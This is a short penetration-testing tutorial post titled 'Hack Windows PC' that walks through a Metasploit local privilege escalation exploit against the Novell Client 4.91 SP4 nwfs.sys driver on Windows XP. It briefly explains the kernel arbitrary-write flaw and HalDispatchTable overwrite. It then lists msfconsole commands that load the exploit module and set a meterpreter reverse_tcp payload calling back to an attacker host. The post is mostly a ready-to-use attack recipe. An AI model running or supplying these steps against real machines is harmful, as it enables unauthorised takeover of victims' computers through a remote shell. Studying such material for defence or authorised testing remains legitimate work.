Categories

Archives

Kali Linux, Penetration Testing

Hack Windows PC using Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation

This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel space. The corruption occurs while handling ioctl requests with code 0x1438BB, where a 0x00000009 dword is written to an arbitrary address. An entry within the HalDispatchTable is overwritten in order to execute arbitrary code when NtQueryIntervalProfile is called. The module has been tested successfully on Windows XP SP3 with Novell Client 4.91 SP4.

Exploit Targets

Novell Client 4.91 SP4

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/local/novell_client_nwfs

msf exploit (novell_client_nwfs)>set payload windows/meterpreter/reverse_tcp

msf exploit (novell_client_nwfs)>set lhost 192.168.1.114 (IP of Local Host)

msf exploit (novell_client_nwfs)>set srvhost 192.168.1.114 (IP of Local Host)

msf exploit (novell_client_nwfs)>set session 1

msf exploit (novell_client_nwfs)>exploit